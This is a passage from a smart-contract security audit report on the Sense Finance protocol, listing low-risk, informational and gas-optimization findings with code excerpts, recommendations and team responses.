However, there is at least one unverified contract in the call-chain. This could entail a griefing attack on this contract and Fuse. Recommendation: Explicitly check that the SeriesStatus to be queued is 33 NONE. +3.3.5 block.timestamp Can Be Manipulated By Miners Severity: Low Risk Context: • Periphery.sol, GClaimManager.sol, Space.sol#L160, Space.sol#L401, • Space.sol#L435, Divider.sol#L30, Divider.sol#L33, Divider.sol#L142, • Divider.sol#L368, Divider.sol#L522, Divider.sol#L564, Divider.sol#L566, • Divider.sol#L572. Situation: On the protocol level, timestamps are a variable submitted by min- ers. The protocol only guarantees its monotonicity. Therefore, they are non- trivially manipulable by miners for purposes of MEV. It is a risk for critical logic of the contract to be dependent on such a vari- able. However, such manipulation would widely affect the Ethereum ecosystem. Therefore, there is a low chance miners would take such a risk. This serves as a notice of the possibility of miner’s manipulating of the times- tamp for the purposes of MEV. Recommendation: The past general recommendation regarding block.timestamp has been to consider block.number as a better gauge of time. However, with the upcoming merge and forks, it may become unreliable for this in the mid- to long-term right now. For a contract that aims to operate consistently following the merge, block.timestamp may be the less risky option compared to block.number in regards to references for elapsed time. The rule of thumb regarding this usage is to make sure that it is for references to longer time frames, i.e. nothing under 1 hour. +3.3.6 Dependence On symbol() Value Severity: Low Risk Context: CAdapter.sol#L176-178 34 Situation: The evaluation of _isCETH depends on the symbol() of a token. With permissonless use of the protocol, this might not be reliable. Recommendation: Consider checking for (whitelisted) addresses instead of token symbol(). +3.3.7 Refrain From Shadowing State Variables Severity: Low Risk Context: Periphery.sol#L351, CAdapter.sol#L133, CAdapter.sol#L156. Situation: Shadowing variables (factory and target), i.e. by having function parameters or other local variables declared with the same name, could lead to unintended consequences; it may even indicate underhanded code design. Variable shadowing could also lead to various mistakes on the dev side. If a state variable is shadowed in a function, then developers think they are access- ing and/or modifying the state variable when it is actually a local variable. Recommendation: Avoid shadowing of state variables with local variables. One way to avoid this is to consider exclusively prefixing or suffixing an un- derscore to state variable names, which should make shadowing impossible, if followed consistently. Sense: This was fixed in #155 and fixed in #158. +3.3.8 Maximum Value of tilt Severity: Low Risk Context: Divider.sol#L279-297 Recommendation: Make sure tilt is not larger than FixedMath.WAD, this can be done in the constructor of BaseAdapter.sol#L78-109 +3.3.9 Reward Has Two Meanings Severity: Low Risk Context: Divider.sol#L157-180, Divider.sol#L334-414 Situation: Reward has 2 meanings: (1) Sum of all the fees in Divider.sol and (2) COMP tokens in adapter 35 This might be confusing. Consider the following code snippet: function _collect(...) internal returns (uint256 collected) { ... Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens // COMP tokens ... ,! } function settleSeries(address adapter, uint48 maturity) external nonReentrant ,! whenNotPaused { ... // Reward the caller for doing the work of settling the Series at around the correct time ... ERC20(target).safeTransferFrom(adapter, msg.sender, series[adapter][maturity].reward); // fees ... ,! ,! } Recommendation: Change one of the two rewards to different names. Sense: Changed one of the two rewards to different names. +3.3.10 Space.sol Contract Missing Necessary Logic To Function As A Balancer Oracle Severity: Low Risk Context: Space.sol, Zero.sol#L15-45, WeightedPool2Tokens.sol Situation: The Space contract is missing the implementation of a number of de- pendencies and functions that necessitate it to work as a BalancerOracleLike with the MasterOracle and PriceOracles within the fuse portion of this project. Zero.sol context notes some of the missing parts. The Sense team has notified us that it hasn’t yet implemented these as they are in the midst of working on more fully understanding its nuances with the Balancer team. Hence, this is set as low risk, because it just entails a portion of the architecture failing to work, if deployed at this stage, if they were to deploy, and they are unlikely to do this. Recommendation: Ensure oracle functionality is properly implemented before deployment so all parts of the architecture work as intended. 36 +3.3.11 Multiple Fixed Math Libraries Severity: Low Risk Context: FixedMath.sol, Rari: FixedPointMathLib.sol, FixedPoint.sol Situation: Three different FixedMath libraries are used in the code. The more libraries are used with duplicate intended purpose the higher the risk of unde- tected issues arising from potential differences in how they may work. The first library, FixedMath.sol, is used in the following: BaseAdapter.sol#L6, CAdapter.sol#L5, CropAdapter.sol#L12, Divider.sol#L10, GClaimManager.sol#L6, Periphery.sol#L7, WstETHAdapter.sol#L5 As: import { FixedMath } from "../external/FixedMath.sol"; The second library, FixedPointMathLib.sol from Rari in the solmate library, is used in the following: LP.sol#L8, Target.sol#L7, Underlying.sol#L7, Zero.sol#L8 As: import { FixedPointMathLib } from ,! "@rari-capital/solmate/src/utils/FixedPointMathLib.sol"; The third library, FixedPoint.sol from Balancer Labs, is used in the following: Space.sol#L6, SpaceFactory.sol#L5 As: import { FixedPoint } from ,! "@balancer-labs/v2-solidity-utils/contracts/math/FixedPoint.sol"; Recommendation: Reduce the number of libraries as much as possible. Also, avoid using different library implementations aiming to achieve the same goal. Choose the one that best suits the needs of your projects, is safe, and backed by audits. Sense: Solmate’s FixedPointMathLib removed here (would have gone with Solmate’s exclusively but mulDow or mulUp is in next but not in the latest stable version just yet). FixedPoint from Balancer is kept because it’s for 0.7.0 and it has and it can do pow functions with floating point numbers. Spearbit: Acknowledged. Do note, you may wish to check the licenses for that code as it appears pulled from yield utils v2. Following the links to the files, 37 they appear to have BUSL-1.1 as their license although their root README states all files within the repository are licensed as MIT. Just something for internal consideration. +3.3.12 Check For Master Oracle Severity: Low Risk Context: LP.sol, Zero.sol Situation: The functions _price() in the contracts ZeroOracle and LPOracle do a call to msg.sender. If msg.sender isn’t the master oracle, then these calls will fail. contract ZeroOracle is PriceOracle, Trust { function _price(address zero) internal view returns (uint256) { ... // assumes the caller is the maser oracle, which will have its own way to get the underlying price return zeroPrice.fmul(PriceOracle(msg.sender).price(underlying), FixedPointMathLib.WAD); // call to msg.sender } ,! ,! } contract LPOracle is PriceOracle, Trust { function _price(address _pool) internal view returns (uint256) { ... uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, FixedPointMathLib.WAD) + // call to msg.sender PriceOracle(msg.sender).price(tokenB).fmul(balanceB, // call to msg.sender FixedPointMathLib.WAD); ... } ,! ,! } Recommendation: Consider verifying the calling msg.sender is indeed the master oracle. However, since these functions are view, access control is required. This just means that if someone is not a master oracle or other price oracle type is calling, then they are wasting their money on gas and it’s ultimately the caller’s issue. 38 +3.3.13 Implement Checks For g1 and g2 Severity: Low Risk Context: SpaceFactory.sol, Space.sol#L105-144 Situation: The function setParams() does some validity checks on g1 and g2. However these checks are not present in the constructors of SpaceFactory and Space.sol. This might lead to situation where the values are set in an incorrect way. contract SpaceFactory is Trust { constructor(...) Trust(msg.sender) { ... g1 = _g1; // no checks for g1 g2 = _g2; // no checks for g2 } function setParams(uint256 _ts,uint256 _g1, uint256 _g2) public requiresTrust { // g1 is for swapping Targets to Zeros and should discount the effective interest ,! ,! require(_g1 <= FixedPoint.ONE, "INVALID_G1"); // g2 is for swapping Zeros to Target and should mark the effective ,! interest up require(_g2 >= FixedPoint.ONE, "INVALID_G2"); ... } } contract Space is IMinimalSwapInfoPool, BalancerPoolToken { constructor(...) BalancerPoolToken(...) { ... // Set Yieldspace config g1 = _g1; // fees are baked into factors `g1` & `g2`, // no checks for g1 g2 = _g2; // see the "Fees" section of the yieldspace paper // no checks for g2 } } Recommendation: Add validity checks for g1 and g2 in constructors of Space- Factory and Space.sol. +3.3.14 Check reserves.length Severity: Low Risk 39 Context: Space.sol Situation: Within the functions onJoinPool() and onExitPool(), there is no check on the length of reserves. As onJoinPool() and onExitPool() functions are called from the Balancer contracts, it is safer to verify the length. This is true because these contracts are unlikely to be exploited based on no checks on the length of reserves. Whereas, in old versions of Solidity (0.4.x), it was possible to send large parameters to an unbound memory array. This could overwrite local variables. function onJoinPool(..., uint256[] memory reserves, ...) external override ,! onlyVault(poolId) returns (...) { ... // no checks on length of reserves } function onExitPool(..., uint256[] memory reserves, ...) external override ,! onlyVault(poolId) returns (...) { ... // no checks on length of reserves } Recommendation: Add the following to onJoinPool() and onExitPool(): require(reserves.length == 2, ...); +3.3.15 Pause Functionality Risk Severity: Low Risk Context: EmergencyStop.sol, Divider.sol#L5 import { Pausable } from "@openzeppelin/contracts/security/Pausable.sol"; Situation: There are 2 ways to pause the protocol: (1) Via the modifier when- NotPaused in Divider.soland (2) Via stop() in EmergencyStop.sol. However, other parts of the code, like the balancer/space pool, are not paus- able. While protocols do have pause functionality in their balancers contracts, this is included . Recommendation: Double check the pause functionality. +3.3.16 downscaleUp Function Does Not Handle 0 Input Severity: Low Risk 40 Context: Space.sol#L502-525 Situation: The functions _downscaleUp() and _downscaleUpArray() will not work if amount == 0. If a safeMath library is used, then an underflow or a revert will occur. function _downscaleUp(uint256 amount, uint256 scalingFactor) internal returns ,! (uint256) { return 1 + (amount - 1) / scalingFactor; } function _downscaleUpArray(uint256[] memory amounts) internal view { (uint8 _zeroi, uint8 _targeti) = getIndices(); amounts[_zeroi] = 1 + (amounts[_zeroi] - 1) / _scalingFactor(true); amounts[_targeti] = 1 + (amounts[_targeti] - 1) / _scalingFactor(false); } Recommendation: Use divUp from the Math.sol#L88-96 Balancer Library. +3.3.17 Unsafe Use of transfer() and transferFrom() Severity: Low Risk Context: BaseAdapter.sol#L117-137 Situation: The function flashLoan() of BaseAdapter.sol uses the functions transfer() and transferFrom(). However, in the rest of source, safeTrans- fer() and safeTransferFrom() are used. function flashLoan(...) external onlyPeriphery returns (bool, uint256) { require(ERC20(target).transfer(address(receiver), amount), Errors.FlashTransferFailed); ... require(ERC20(target).transferFrom(address(receiver), address(this), amount), Errors.FlashRepayFailed); ... ,! ,! } Recommendation: Using the safe versions is slightly safer and is more consis- tent. We recommend that the Sense team replace transfer() with safeTrans- fer() and replace transferFrom() with safeTransferFrom(). Sense: Fixed here. Spearbit: An addendum here for your consideration: there was a recent hack exploiting a safeTransfer implementation that differed from OpenZeppelin’s. Technically it was less safe, in that calling it on the zero address, or EOAs, it 41 would not revert. OZ actually checks that some contract code exists, so re- moves the possibility that lead to this specific exploit. I looked at the solmate implementation, it doesn’t check for this either, so is technically a ’less safer’ implementation like the one that was used leading to said exploit. Also tested similarly and confirmed. Article regarding the exploit. Do note other variables were at play leading to the exploit, and using solmate’s version itself won’t lead you to an exploit. Be aware of this when using it regard- ing the above and difference from OZ. However, many realizable exploits tend to come from a few holes that can be connected together. +3.3.18 Verify decimals() <= 18 Severity: Low Risk Context: Space.sol#L132-L133, Periphery.sol#L443, Periphery.sol#L625 Situation: In a few locations in the code, it is assumed that the number of If the number of decimals decimals of a token is smaller than or equal to 18. happens to be larger than 18, an underflow or a revert will occur. Note: Balancer also requires a maximum of 18 decimals, see Balancer Labs v2's WeightedPool2Tokens.sol#L72: // These factors are always greater than or equal to one: tokens with more than ,! 18 decimals are not supported. Recommendation: As the number of decimals of all used tokens are derived from the number of decimals from the Target token, it is sufficient to verify that the Target tokens has 18 decimals or less. This can be checked in the function deploy() of contract TokenHandler in Di- vider.sol on line 672. +3.3.19 Preconditions Of addSeries() Unchecked Severity: Low Risk Context: PoolManager.sol#L221-224, Zero.sol#L81 Situation: The function addSeries() should only be executed when the yield space pool has filled its buffer. 42 Although retrieving oracle _price() will only work once the buffer is sufficiently filled, it is more defensive to explicitly check the preconditions in function addSeries(). contract PoolManager is Trust { ... function addSeries(address adapter, uint48 maturity) external { require(sStatus[adapter][maturity] == SeriesStatus.QUEUED, ,! Errors.SeriesNotQueued); ... } } contract ZeroOracle is PriceOracle, Trust { function _price(address zero) internal view returns (uint256) { ... (, , , , , , uint256 sampleTs) = pool.getSample(1023); if (sampleTs == 0) { ... } } } Recommendation: Consider explicitly checking all preconditions in addSeries(). +3.3.20 Contract Names Differ From File Names Severity: Low Risk Context: LP.sol#L52, Target.sol#L13, Underlying.sol#L13, Zero.sol#L52, IRModel.sol#L8 Situation: Several contracts have a file name that is different from the contract In addition, certain solidity tools expect the file name and the contract name. name to be the same. This can be confusing for developers or others diving into the code-base. Recommendation: Make the file names and contract names the same. 3.4 Informational Issues: +3.4.1 zero Should Be pool Severity: Informational Context: LP.sol 43 Situation: The function price() in contract LPOracle references the variable zero. This is probably a copy-paste error and should be pool, just like in function _price(). contract LPOracle is PriceOracle, Trust { ... function price(address zero) external view override returns (uint256) { // zero should be pool return _price(zero); } function _price(address _pool) internal view returns (uint256) { ... } } Recommendation: Rename zero to pool. +3.4.2 Bump Space Contracts to Compile with Latest Solidity 0.7.x Severity: Informational Context: hardhat.config.js#L110 Situation: The deployment scripts do not target the latest available minor ver- sion for the previous major Solidity version 0.7.0. They are compiled with 0.7.5 while 0.7.6 is the latest. It was mentioned this was done to match Balancer’s contract versions, however, Balancer’s deployed contracts on Ethereum mainnet appear to target 0.7.1. Recommendation: Bump to the latest Solidity version 0.7.6 to benefit from a number of bug fixes and underhanded coding that have been disallowed with the scanner. If an earlier minor Solidity version of 0.7.x is required, please note so and why. References: Vault: earliest deployment, Balancer Relayer: one of their earli- est deployments. +3.4.3 Use pragma abicoder v2 Severity: Informational Context: Space.sol#L3, SpaceFactory.sol#L3 44 Situation: In the latest versions of Solidity 0.7.x, the ABIEncoderV2 is no longer experimental. It is best practice not to use experimental construction in production code. Recommendation: Replace the following: pragma experimental ABIEncoderV2; with: pragma abicoder v2; +3.4.4 Use Consistent Optimizer Runs for CI And Targeted Deployment Severity: Informational Context: justfile#L102-130, hardhat.config.js#L103-L111 Situation: The testing scripts utilize a different set of optimizer runs than the deployment scripts. The testing scripts are set to 20 runs, while the Space package uses the default at 200 and the other 0.8.11 contracts use 1000 runs. This is problematic as the tests will essentially be checking bytecode that is different than what will end up being deployed. It can also make it so that the contract’s deploy size for the tests meets the 24576 bytes maximum limit set during the spurious dragon fork, but the deployment scripts end up exceeding it, and therefore fail. Runs does not indicate how many times the optimizer runs for, but how many runs the contract is expected to have and whether to optimize for runtime or deploy size. The 200 default should generally save on both. Setting runs higher or lower, should not affect the speed of the optimizer in a significant manner, so don’t try and use lower runs for speed. The documentation covering the runs parameter is here: Solidity Docs - Opti- mizer Parameter Runs. Recommendation: Contracts and their backing tests should ideally use the same runs parameter, just as they should compile with the same version of solidity. Each contract may have their own specific run parameter set as needed, in the case of an often re-deployed contract, but not run as often, lower runs may 45 make sense, while one that will be used many times may want to use higher runs. +3.4.5 Ensure CI Runs Tests For All Packages Of monorepo Severity: Informational Context: package.json#L12-19, ci.yml, CI for PR #153 Situation: While referencing the CI scripts to help with building the project, it was discovered the CI only runs on the v1-core portion of the project and ignores the others like v1-fuse and v1-space. This is the case for the commit hash audited and latest commit as of b888eda. Recommendation: Ensure the CI runs on all portions of the monorepo, as oth- erwise bugs may slip through if the team thinks the CI is testing the other pack- ages, but in fact it is not. +3.4.6 Check Function Parameters To Be Non-Zero Severity: Informational Context: setPeriphery() in Divider.sol#L487-492 /// @notice Set periphery's contract /// @param _periphery Target address function setPeriphery(address _periphery) external requiresTrust { periphery = _periphery; emit PeripheryChanged(_periphery); } Situation: In several functions, no checks are done to verify the supplied pa- rameters are non-zero. Recommendation: Add zero checks to the setPeriphery(). Sense: We decided to omit these checks for governance functions. +3.4.7 Don’t Use Hard coded Values Severity: Informational Context: Zero.sol#L74-L81 46 function _price(address zero) internal view returns (uint256) { BalancerOracleLike pool = BalancerOracleLike(pools[address(zero)]); require(pool != BalancerOracleLike(address(0)), "Zero must have a pool set"); ... (, , , , , , uint256 sampleTs) = pool.getSample(1023); ... ,! } Situation: The function _price() in Zero.sol uses a hard code value of 1023. Even though Balancer’s WeightedPool2Tokens also states 1023, it is not recom- mended to rely on hard coded values. The value 1023 is equal to Buffer.SIZE in Buffer.sol#L20. This Buffer.SIZE can also be retrieved via getTotalSamples() in PoolPriceOracle.sol#L76-78. function getTotalSamples() external pure override returns (uint256) { return Buffer.SIZE; } Recommendation: Use the following code to not rely on hard coded values: (, , , , , , uint256 sampleTs) = pool.getSample(pool.getTotalSamples() - 1); Note: For efficiency purposes, using hard coded values makes sense. How- ever, it is perhaps safer to import that library and evaluate Buffer.SIZE - 1 as needed in case of changes. This enhances code maintainability and keeps things safer in case of any changes on the Balancer side. If Balancer confirms to the Sense team that they will never end up changing it, at least with the ver- sion of Balancer Sense plans to use, they may consider keeping the hard coded approach for gas optimization. +3.4.8 Consider Separating TokenHandler Into It’s Own Source File Severity: Informational Context: Divider.sol#L655-L702. Situation: TokenHandler is a standalone contract that is also specifically de- ployed in the deployment scripts, but its source is currently buried at the bottom of the Divider’s source file. Recommendation: In staying consistent with the rest of the project, this con- tract should be contained within its own source file. 47 +3.4.9 Remove Any Lines With Unused Imports Severity: Informational Context: CropAdapter.sol#L5, CropAdapter.sol#L9-10 import { Periphery } from "../Periphery.sol"; import { Divider } from "../Divider.sol"; Situation: There are instances where contracts are imported, but never used by the importing contract in question. This can affect contract readability as you may expect it to have some used functionality or dependence on the import when it does not. Recommendation: It is best practice to not have dead or unused code, includ- ing imports. Remove these occurrences and any other. The noted were quickly identified, but there may be other instances of this the team should explore. Sense: Addressed here. +3.4.10 Some Functions Can Be Restricted to Pure or View Severity: Informational Context: • Space.sol#L342, Space.sol#L389, Space.sol#L434, • Space.sol#L497, Space.sol#L502 Situation: Declaring a function appropriately as view or pure helps clarify intent of the function to the end-reader. The more restricted a function is, the "safer" it can be considered and the intent of state modification/access become clearer. A number of functions that could be restricted, are not. Recommendation: Declare the most restrictive view/pure specifier available for a function and only leave it out if that function is planned to have certain state modifications/access. Sense.finance: Addressed here. +3.4.11 Ensure Comments Match Actual Code Logic Severity: Informational Context: 48 • GClaimManager.sol#L106, Space.sol#L433, BaseAdapter.sol#L67-69, • Divider.sol#L538, Periphery.sol#L129 Situation: There are multiple instances where comments in the submitted code do not match the underlying specifications or functionality of the code block they refer to. This hurts code readability and is not best practice. e.g. The following comment is not accurate: /// @dev This can't be a view function b/c `Adapter.scale` is not a view ,! function Adapter.scale is never accessed, and function is indeed restrictable to view. /// @notice The number this function returns will be used to determine its access by checking for binary ,! /// digits using the following scheme: ,! /// (e.g. 0101 enables `collect` and `issue`, but not `combine`) The 0101 would in fact enable just init and combine, while restricting issue and collect along with the other parts of Level that are undefined here. 1 indicates restrict rather than enable as stated here. // Determine where the stake should go depending on where we are relative to the maturity date ,! address stakeDst = adapters[adapter] ? cup : series[adapter][maturity].sponsor; The related code never checks maturity in question, but the status of the adapter, which provides no measures of time, as the adapter can be disabled at any point. uint256 tBal = Adapter(adapter).wrapUnderlying(uBal); // convert target to ,! underlying The code logic does the opposite of what is stated and is likely repeated copy/paste of similar lines and remnant of comment. It actually wraps underlying to target and comment should state that. Recommendation: Keep comments updated and consistent alongside code logic. 49 +3.4.12 Better Define SPONSOR_WINDOW or Document Difference From Other Window with Comments Severity: Informational Context: • Divider.sol#L29, Divider.sol#L30, • Divider.sol#L564, Divider.sol#L566. Situation: A variable named SETTLEMENT_WINDOW provides a window equivalent to its set time of 2 hours for anyone to settle after some preconditions. SPONSOR_WINDOW on the other hand, provides a window before and after some preconditions, effectively doubling it’s set time from 4 hours to 8 hours, which is inconsistent with how SETTLEMENT_WINDOW is applied. The intent of this is not particularly clear and could be misread as a mistake by consulting the code alone. There were tests within this project confirming this was intended. Recommendation: We recommend changing the variable names (i.e. PRE_- SPONSOR_WINDOW and POST_SPONSOR_WINDOW) to make the intent clear that one should apply before and the other after a sponsor window. This way their effec- tive windows can be considered cumulatively. In the case that this is not preferable, we recommend that the Sense team at least make it clear with comments, in both cases, of when and how these variables are applied, as they are applied in different circumstances. +3.4.13 Remove Or Address Unused Variables Severity: Informational Context: Periphery.sol#L32 uint32 public constant TWAP_PERIOD = 10 minutes; // ideal TWAP interval^ LP.sol#L57 uint32 public constant TWAP_PERIOD = 1 hours; Situation: The unused variables could indicate a developer error with either introducing unused variables or their accompanying logic being missing and or 50 unfinished. It may introduce unnecessary deployment or run cost overhead. Recommendation: Remove the unused variables, if erroneously included and not intended to be used. Alternatively, supplement with appropriate backing logic that uses the variable. Sense: Fixed in #155. +3.4.14 Document All Function Parameters And Return Values Severity: Informational Context: Periphery.sol#L253-265 Situation: Most of the time, function parameters are documented with Natspec. The return parameters are documented far less frequent, especially with un- named return values, like in addLiquidityFromUnderlying(). This makes the code more difficult to read. Note: With the later versions of Solidity, you can also document multiple return values with NatSpec. function addLiquidityFromUnderlying(...) external returns ( uint256, uint256, uint256 ) { } ... Recommendation: Document all the function parameters and return values with Natspec. +3.4.15 Simplify Token Ordering Code In Space.sol Severity: Informational Context: Space.sol Situation: The contract Space has a lot of code to manage the order of the tokens in an array. This ordering is necessary because Balancer requires the tokens to be in a specific order: sorted by token address. Recommendation: Use the same way to represent difference between the tokens, e.g. either boolean or uint8. 51 The following snippets could be used: tokens[1- _zeroi] = IERC20(target); function getIndices() public view returns (uint8 _zeroi, uint8 _targeti) { _zeroi = zeroi; _targeti = 1 - _zeroi; } This can be used if scalingFactor() used uint8 as a parameter. function _upscaleArray(uint256[] memory amounts) internal view { amounts[0] *= scalingFactor(0); amounts[1] *= scalingFactor(1); } Consider using a fixed token order. As the address for the zero token is generated by deploy() in contract Token- Handler in Divider.sol#L682-L689, it is possible to do this via CREATE2. That way you can generate an address for token zero such that it is smaller than target. With a require(zero < target), you can enforce this. Trying out different salts for CREATE2 can be done on-chain for a normal address of target, with less than 10 tries you should be able to find an address that is smaller than target. With computeAddress() of OpenZeppelin Create2.sol#L57-64, you can calculate the address without deploying. However, if target happens to be a vanity address with a lot of leading zeros, this will not work. In that case, the Sense team should generated an appropriate salt and pass that via sponsorSeries() of Periphery.sol#L66-76 to initSeries() of Divider.sol#L117-130. A tool to generate a vanity address can be found here: ERADICATE2. This way the sort order is fixed and the code of Space can be less complicated. +3.4.16 Unexpected Functionality of _swapTargetForClaims() Severity: Informational Context: Periphery.sol#L414-431 Situation: The function _swapTargetForClaims() tries to swap target tokens for claim tokens. However, this cannot be done in one step. 52 First, it issues new zero and claim tokens and moves the supplied target to the adapter. Second, it swaps the (unwanted) zero tokens to target tokens. Third, it returns the resulting claim and target tokens to the caller of the function. From a functional point of view this is unexpected. The caller receives target tokens back, which is what the caller started with. This will make the logic from the caller side more complicated. function _swapTargetForClaims(...) internal returns (uint256) { ... // transfer claims & target to user ERC20(Adapter(adapter).target()).safeTransfer(msg.sender, tBal); ... } Recommendation: Document this feature of the function in a comment. Alternatively, consider using a flashloan to loan extra target and return the extra target at the end of the flashloan. Sense: We tried using a flashloan, but ended up doing it this way. +3.4.17 Keep Build Instructions And Scripts Up To Date Severity: Informational Context: README.md Situation: The provided instructions within the README were not sufficient to successfully build the project. The instructions advises you to install dapptools, however, the project no longer builds with dapptools due to a change in So- lidity 0.8.8. This change in dapptools requires remappings not automatically whitelisted any longer; they need to be explicitly set in the --allow-path flag. The project at the provided commit is set to build with foundry/forge whose installation instructions were missing and requires a specific commit installation to work. There are still a number of project scripts with references to dapptools that fail, such as build and test. Recommendation: Remove any project scripts no longer supported or work- ing, and provide working installation instructions on how to successfully build with the existing commit within the README. 53 3.5 Gas Optimizations +3.5.1 Optimize Levels Library Severity: Gas Optimization Context: Levels.sol Situation: This contract has optimization potential. By replacing the expres- sions throughout the code with hardcoded values, the compiler will be able to evaluate some of them at build-time. Recommendation: Instead of calculating BIT on each run, simply set the bit to the correct decimal representation, in the case of 2**3: uint256 private constant _COLLECT_BIT = 8; Refactor the corresponding function; remove the unnecessary exponentiation which can become costly: function collectDisabled(uint256 level) internal pure returns (bool) { return level & _COLLECT_BIT != _COLLECT_BIT; } Repeat this for the other BIT variables and their functions. This helps the com- piler omit unnecessary runtime computation through constant folding. Initial profiling on Remix indicates potential gas savings of 272 to 521 gas with optimizer set on 200 runs (greater savings on higher order bits). +3.5.2 Determine Usage Of WETH Once Severity: Gas Optimization Context: BaseAdapter.sol, CropAdapter.sol, CAdapter.sol Situation: Within the contract CAdapter, _isCETH(_target) / _isCETH(target) is used several times. As target is stored in an immutable variable, it is also possible to store _- isCETH(target) in an immutable variable. This will save gas and simplify the code. 54 abstract contract BaseAdapter { address public immutable target; constructor(..., address _target, ...) { ... target = _target; } } abstract contract CropAdapter is BaseAdapter { constructor(..., address _target, ...) BaseAdapter(..., _target, ...) { } } contract CAdapter is CropAdapter { constructor(..., address _target, ...) CropAdapter(..., _target, ...) { ... } ,! } Occurrences of isCETH() in CAdapter.sol: • CAdapter.sol#L90, CAdapter.sol#L119, CAdapter.sol#L123, • CAdapter.sol#L127, CAdapter.sol#L151, CAdapter.sol#L172. Additionally, _isCETH() is used to differentiate between WETH and the underly- ing() token in the following CAdapter.sol#L90 and CAdapter.sol#L119: ERC20 u = ERC20(_isCETH(_target) ? WETH : ,! CTokenInterface(_target).underlying()); return _isCETH(target) ? WETH : CTokenInterface(target).underlying(); This result can also be stored in an immutable variable to save some gas and simplify the code. Recommendation: Store _isCETH(target) in an immutable variable and store the result of ERC20(_isCETH(_target) ? WETH : CTokenInterface(_target).underlying()) in an immutable variable. Sense: Fixed here. +3.5.3 Redundant Calls to setPermissionless() Severity: Gas Optimization 55 Context: EmergencyStop.sol#L18-25 function stop(address[] memory adapters) external virtual requiresTrust { Divider(divider).setPermissionless(false); for (uint256 i = 0; i < adapters.length; i++) { Divider(divider).setPermissionless(false); Divider(divider).setAdapter(adapters[i], false); emit Stopped(adapters[i]); } } Situation: The function stop() is calling setPermissionless(false) multiple times. Calling it once should be enough. Recommendation: Remove the redundant call to setPermissionless(false) in the for loop. Sense: Addressed in #155. +3.5.4 Save with safeTransferFrom in sponsorSeries Severity: Gas Optimization Context: Divider.sol#L117-150, Periphery.sol#L66-L76 Situation: The function sponsorSeries() transfers stake tokens to the Periph- ery contract, then calls initSeries, which transfers these same tokens to the adapter. Note that initSeries uses the modifier onlyPeriphery, so it can only be called from the Periphery contract. This could also be done in one step, which saves some gas. 56 contract Periphery is Trust { ,! ,! ,! ... function sponsorSeries(address adapter, uint48 maturity) external returns (address zero, address claim) { (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget(); ... // Transfer stakeSize from sponsor into this contract uint256 stakeDecimals = ERC20(stake).decimals(); ERC20(stake).safeTransferFrom(msg.sender, address(this), _convertToBase(stakeSize, stakeDecimals)); // Approve divider to withdraw stake assets ERC20(stake).safeApprove(address(divider), stakeSize); (zero, claim) = divider.initSeries(adapter, maturity, msg.sender); ... } } contract Divider is Trust, ReentrancyGuard, Pausable { ... function initSeries(address adapter, ... ) external onlyPeriphery whenNotPaused returns (address zero, address claim) { ,! ... (address target, address stake, uint256 stakeSize) = ,! Adapter(adapter).getStakeAndTarget(); ... ERC20(stake).safeTransferFrom(msg.sender, adapter, stakeSize); ... } } Recommendation: Consider moving the stake tokens directly to the adapter. Be careful to include all necessary checks. Sense: We may be in favour of this change, but it "mixes" things. The divider is supposed to charge that stake from whoever calls initSeries. +3.5.5 Balancer Tokens Are Already Sorted Severity: Gas Optimization Context: Zero.sol#L74-L110 Situation: Balancer requires tokens to be sorted, so the result of getPoolTo- kens() is also sorted. This means Sense does not have to discover which token is the zero token. 57 function _price(address zero) internal view returns (uint256) { ,! ... (ERC20[] memory tokens, , ) = BalancerVault(pool.getVault()).getPoolTokens(pool.getPoolId()); address underlying; // tokens[] is sorted, so this check can be optimized if (address(zero) == address(tokens[0])) { underlying = address(tokens[1]); } else { underlying = address(tokens[0]); } ... } Recommendation: Sense could use the following construction, which is in line with the rest of the code: // change this line to include _targeti (uint8 _zeroi, uint8 _targeti) = getIndices(); underlying = address(tokens[_targeti]); +3.5.6 Use Custom Errors Severity: Gas Optimization Context: Errors.sol Situation: Strings are used to encode error messages. With the current Solidity versions, it is possible to replace them with custom errors, which are more gas efficient. Most errors are derived from Errors.sol, but several error messages are also hardcoded. See the examples below: • CAdapter.sol#L139, CAdapter.sol#L157, CAdapter.sol#L164, • SpaceFactory.sol#L66, SpaceFactory.sol#L81, SpaceFactory.sol#L83, • Target.sol#L37, Underlying.sol#L35, WstETHAdapter.sol#L139, • Zero.sol#L76, Zero.sol#L84, Space.sol#L160, • Space.sol#L424, PoolManager.sol#L290 Recommendation: Implement custom errors as explained in the Solidity Lan- guage Blog: Custom Errors Explainer. 58 Sense: Fixed here. +3.5.7 Use Full-Sized Types For Minimal Gas Cost Overhead On immuta- bles or constants Severity: Gas Optimization Context: Space.sol, BaseAdapter.sol, Claim.sol, BaseFactory.sol Situation: Immutable/Constant variables do not yield any gas savings normally appropriated to smaller bit-sized types. This is because they do not use storage slots and, therefore, do not benefit from tight packing storage slots. Instead, they are more likely to introduce increased gas costs for end-users. These increased costs are due to the overhead of the EVM working on smaller bytes. The EVM itself is designed to operate on 32 bytes at a time. It introduces more instructions to appropriately handle these smaller types. Recommendation: Unless utilizing the ability of the smaller types to wrap for some algorithmic purpose or other external requirements/constraints, you should use the fully-sized respective type available for highest efficiency when it comes to immutables/constants. +3.5.8 Getter for Only Zero And Claim Severity: Gas Optimization Context: • PoolManager.sol#L206, PoolManager.sol#L226, SpaceFactory.sol#L68, • GClaimManager.sol#L43, GClaimManager.sol#L82, GClaimManager.sol#L114, • Periphery.sol#L395, Periphery.sol#L407, Periphery.sol#L559, • Divider.sol#L70-L96 Situation: On several locations, the addresses for zero and/or claim are re- trieved from the Divider contract using the getter function for the series array. This uses a relative large amount of gas as 9 parameters are retrieved of which only 2 are used. This also depends on the order of the elements in struct Series. For reference, consider the following snippet in Periphery.sol#L395, Periph- ery.sol#L407, and Periphery.sol#L559: 59 (address zero, , , , , , , , ) = Divider(divider).series(adapter, maturity); Recommendation: Create a function to only retrieve the zero and claim ad- dress from the contract Divider, i.e. have different functions for retrieving zero and claim. Sense: Fixed here. +3.5.9 Consolidate Mappings Accessed by Same Key Into Struct Severity: Gas Optimization Context: • Divider.sol#L58, Divider.sol#L73, Divider.sol#L67, • Divider.sol#L70, PoolManager.sol#L94-98 Situation: Multiple mappings are accessed by the same key in both Divider.sol and PoolManager.sol. Recommendation: Consolidating the multiple mappings into a struct could yield gains in code readability and gas optimization. Gas optimization could arise from packing smaller types into a single storage slot, thereby benefiting from improved warm storage access. This also po- tentially benefits the code-base from singular dirty slots for multiple variables, 